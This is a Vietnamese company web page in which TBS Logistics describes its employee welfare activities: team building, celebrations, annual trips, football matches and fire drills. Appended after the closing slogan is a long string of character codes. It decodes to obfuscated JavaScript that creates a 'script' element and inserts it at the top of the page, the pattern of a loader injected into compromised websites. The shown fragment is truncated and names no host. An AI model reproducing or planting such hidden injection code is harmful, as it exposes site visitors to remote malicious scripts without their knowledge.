TBS: thuận một lòng – bền một chí – sáng tương lai

TBS logistics luôn hướng tới người lao động, công ty luôn là một gia đình, tất cả cùng hướng tới mục đích nâng cao đời sống người lao động, cùng nhau rèn luyện, học tập, nâng cao tay nghề, chuyên môn.

SONY DSC
teambuilding-02
Hình ảnh: Team Buiding – thực hành kỹ năng làm việc nhóm

Thường xuyên chăm lo đời sống tinh thần cho người lao động. Ví dụ: tổ chức sinh nhật hàng tháng, 20-10, 8-3 cho chị em cán bộ công nhân viên.

20-10
SONY DSC

Tổ chức du lịch thường niên cho toàn thể Anh/chị em công ty, du lịch nghỉ dưỡng và gắn kết, xây dựng tinh thần đoàn kết.

SONY DSC
SONY DSC

Tổ chức giải đá bóng giao hữu thường niên với khách hàng và các đơn vị bạn.

da-banh-01
da-banh-03

Ngoài ra công tác an toàn phòng cháy chữa cháy (PCCC) luôn được TBS logistics đưa lên ưu tiên hàng đầu, thường xuyên tổ chức tập luyện, diễn tập cho cán bộ công nhân viên.

pccc-02
pccc-01

TBS LOGISTICS – Chung sức kiến tạo tương lai

16,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));